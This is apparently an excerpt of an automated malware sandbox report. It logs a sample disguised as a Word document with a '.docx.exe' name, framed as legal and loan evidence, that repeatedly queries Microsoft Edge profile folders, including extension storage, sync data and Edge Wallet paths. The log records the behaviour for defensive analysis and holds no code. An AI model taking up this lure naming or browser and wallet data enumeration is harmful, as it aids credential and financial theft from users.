Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\mn VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\mr VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\ms VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\my VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\ne VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\nl VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\no VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\pa VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\pl VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\pt_BR VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\pt_PT VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\ro VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\ru VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\si VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\sk VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\sl VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\sr VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\sv VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\sw VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\ta VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\te VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\th VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\tr VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\uk VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\ur VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\vi VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\zh_CN VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\zh_HK VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\zh_TW VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\zu VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_metadata VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\jmjflgjpcpepeafmmgdpfkogkghcpiha VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\jmjflgjpcpepeafmmgdpfkogkghcpiha\1.2.0_0 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\jmjflgjpcpepeafmmgdpfkogkghcpiha\1.2.0_0\_metadata VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\GPUCache VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\JumpListIconsRecentWorkspacesV2 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Nurturing VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Segmentation Platform VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Segmentation Platform\SegmentInfoDB VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Segmentation Platform\SignalDB VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Segmentation Platform\SignalStorageConfigDB VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Cache VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Cache\Cache_Data VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Code Cache VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Code Cache\js VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Code Cache\js\index-dir VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Code Cache\wasm VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Code Cache\wasm\index-dir VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\DawnCache VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\GPUCache VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\blob_storage VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\blob_storage\a72670a9-643e-4e4e-b4d5-e6019a48f42a VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\commerce_subscription_db VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\optimization_guide_hint_cache_store VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\optimization_guide_model_metadata_store VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\EADPData Component VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\EADPData Component\4.0.2.33 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Designer VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Designer\1.0.0.20 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Shopping VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Shopping\2.0.5959.0 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Shopping\2.0.5975.0 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Travel VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Travel\1.0.0.2 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\Mini-Wallet VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\Notification VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\Tokenized-Card VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\Wallet-Checkout VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\bnpl VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-ec VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-ec\ar VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-ec\de VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-ec\en-GB VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-ec\es VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-ec\fr VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-ec\fr-CA VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-ec\id VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-ec\it VolumeInformation	Jump to behavior
